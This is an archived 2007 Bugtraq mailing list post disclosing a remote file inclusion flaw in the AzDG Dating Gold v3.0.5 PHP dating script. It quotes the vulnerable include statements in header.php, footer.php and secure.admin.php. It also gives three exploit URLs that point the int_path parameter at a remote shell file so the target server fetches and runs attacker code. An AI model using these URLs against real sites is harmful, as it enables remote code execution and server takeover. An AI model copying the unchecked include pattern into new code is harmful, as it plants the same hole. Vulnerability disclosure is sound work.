lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070713013338.27057.qmail@securityfocus.com>
Date: 13 Jul 2007 01:33:38 -0000
From: mostafa_ragab@....com
To: bugtraq@...urityfocus.com
Subject: AzDG Dating Gold v3.0.5 ===> Remote File Include Vulnerability

___+0+___N0Te:-I am N0t HaCkEr I aM ScRipTs ExplOit FiNder____++_____
----------------------------------------------------------------------
_*_ScRipT NamE:-AzDG Dating Gold v3.0.5
---------------------------------------
_*_Download scRipt:-http://www.ar-share.com/download2.php?a=29704&b=32bf59e0268548cfdde4f79a44ed969c
----------------------------------------------------------------------------------------------------
(-_-)DisCoveRed By:- ThE dE@Th
------------------------------
(-_-)ConTaCt mE @:-h4cked.eg[at]hotmail.com
-------------------------------------------
(*)BuG In:- header.php
include_once $int_path."/classes/AzDG.template2.inc.php";
//include_once $int_path."/classes/AzDG.template3.inc.php";
----------------------------------------------------------
(*)BuG In:- footer.php
include_once $int_path."/classes/AzDGOnlineUsers.class.inc.php";
---------------------------------------------------------------
(*)BuG In:-secure.admin.php
if (isset($l) && !is_dir($int_path.'/languages/'.$l) && $l != "")
{
      include $int_path."/languages/default/default.admin.php";
      include $int_path."/templates/header.php";
---------------------------------------------------------------
<#>Exploit:-www.sitename.x/scriptpath/templates/header.php?int_path=http://shell.txt?cmd
----------------------------------------------------------------------------------------
<#>Exploit:-www.sitename.x/scriptpath/templates/footer.php?int_path=http://shell.txt?cmd
----------------------------------------------------------------------------------------
<#>Exploit:-www.sitename.x/scriptpath/templates/secure.admin.php?int_path=http://shell.txt?cmd
----------------------------------------------------------------------------------------------
{*}All Greats 2 Asb-May Team,Arab Security Team,TiGeR HaCkeR,ToOoFa,HaCk.eGy,ALk()mand()z,N04HaRD,BriGhTdArK
------------------------------------------------------------------------------------------------------------
E x I t......

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ